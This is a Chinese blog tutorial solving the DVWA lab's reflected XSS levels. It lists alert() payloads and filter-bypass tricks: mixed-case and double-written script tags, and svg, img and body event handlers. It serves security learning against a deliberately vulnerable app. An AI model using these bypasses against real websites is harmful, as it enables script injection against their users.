DVWA-XSS(Reflected)Low/Medium/High低中高级别

文章详细介绍了XSS攻击中的Low、Medium和High三个级别,展示了如何通过不同的payload和绕过方法触发JavaScript代码执行,包括对<script>标签的过滤绕过和利用其他HTML标签实现攻击,强调了网络安全中对输入数据的过滤和验证的重要性。
摘要由CSDN通过智能技术生成

「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「推荐专栏」:对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》


这一关的功能是:把用户输入的名字在页面显示出来。

用户输入内容后,点击提交,把输入的内容赋值给参数name,使用Get请求传递给后端,后台处理后,在页面输出用户输入的内容。

在这里插入图片描述

一、Low级别

低级别没有过滤,直接提交JS代码即可,payload:

<script>alert('就TM你叫韩毅啊')</script>

在输入框中输入 payload,点 submit 提交

在这里插入图片描述
弹窗就算过关

在这里插入图片描述

二、Medium级别

中级别过滤了 <script

在这里插入图片描述

只过滤了小写的 <script,可以用大小写绕过,payload:

<Script>alert('就TM你叫韩毅啊')</script>

在输入框中输入 payload,点击 submit 提交

在这里插入图片描述

弹窗就算过关

在这里插入图片描述

或者使用双写绕过,payload:

<scr<script>ipt>alert('就TM你叫韩毅啊')</script>

三、High级别

高级别利用正则表达式,过滤了 <script 的所有大小写和复写形式。

在这里插入图片描述
后台只过滤 <script,但其他标签没有限制,可以使用替代标签绕过,比如 <scg 或 <img 或 <body 等标签,payload:

<svg onload=alert('就TM你叫韩毅啊')>
<img src=1 onerror=alert('就TM你叫韩毅啊')>
<body onload=alert('就TM你叫韩毅啊')>
评论 85
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值